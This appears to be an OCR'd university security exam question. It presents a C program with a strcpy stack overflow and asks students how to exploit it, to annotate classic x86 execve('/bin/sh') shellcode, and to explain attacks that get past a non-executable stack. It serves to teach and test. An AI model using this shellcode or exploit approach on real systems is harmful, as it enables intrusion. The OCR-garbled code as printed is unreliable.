3. Consider the following C code fragment and assume the program name is fixed to vuln, it is invoked as ./vuln (i.e., argv[0]) and cannot be changed by an attacker. 1 int 2 main (int argc, char **argv) 3 { 4 if (argv[1]) 5 return foo (argv[1]); 6 else 7 return foo (argv[0]); 8 } 9 10 int 11 foo ( char *arg) 12 { 13 14 char bar[128]; 15 16 if (sizeof(arg) > 128) { 17 strcpy(bar, arg); 18 19 // never return to main 20 exit (0); 21 } 22 23 strcpy(bar, arg); 24 25 return strlen (bar); 26 } 1 a. Does the program suffer from a memory corruption vulnerability? If not, explain the reasons. If yes, explain the reasons and and how it is possible to successfully exploit this vulnerability. In other words, is it possible to provide specific input to such a program to take advantage of its vulnerability and thus execute arbitrary code (for instance, spawning a shell), on x86-32 architectures? If yes, explain how you would exploit it (high-level steps, including what input and size you should provide). If not, explain why and what you would change in the code to make it exploitable. [5 marks) II b. Assuming that the above code is vulnerable (or can be modified to be- come vulnerable) and that the vulnerability can be successfully exploited (or can be modified to be exploited), then consider the following x86 assembly code fragment, which may be used to exploit the previous vulnerability: 1 int 2 main (void) 3 { 4 5 asm__( 6 "jmp ahead " 7 "back: " 8 popl %ebx " 9 movl %ebx , 0x8(%ebx) " 10 xorl %eax, %eaxin" 11 movb %al, 0x7(%ebx) " 12 movl %eax, Oxc(%ebx) " 13 movl %eax, %edx " 14 movl $0xb, %eax " 15 movl Oxc(%ebx). %ecx " 16 int $0x80 " 17 "ahead: " 18 call backIn" 19 .string \"/bin/sh |"" 20 ); 21 } 11 II 11 11 11 11 11 11 II II i. Assuming the above assembly snippet (shown in Question 3 (b)) is placed on the stack, what does the assembly code do? Add comments to each line and explain its semantics in the context of the shellcode. For instance, the instruction mov $0xb, %eax copies the constant value Oxb into the register %eax. This represents the index that refers to the system call execve. [12 marks] ii. An attacker creates a suitable injection vector to exploit the afore- mentioned memory error. To this end, he places the shellcode in the injection vector, pads it with his initials so as to create a message long enough to overflow bar; then the attacker adds the appropriate address at the right place and terminates the message with a NULL ('\0'). In other words, the injection vector looks as follows: ----+ nop sled | shellcode | Oxbfff1234 | 10 | -+----+ Next, he runs the program giving this injection vector to it as its first argument. To his surprise, the attack fails. He asks you for help. State why the attack cannot work. [2 marks] iii. Show how the shellcode can be modified to make the attack pos- sible. (Note: don't worry if you do not know the exact syntax of instructions; marks will be awarded for a clear explanation.) [2 marks] c. Assume the code shown at the beginning of the question is vulnerable (or can be modified to be so) and the vulnerability can be successfully exploited. State and describe what technique(s) would an attacker use to exploit the vulnerability shown at the beginning of the question, if the kernel enforces a non-executable stack protection (again, assume the small program shown at the beginning of the question is exploitable or can be modified to be exploited successfully)? [4 marks]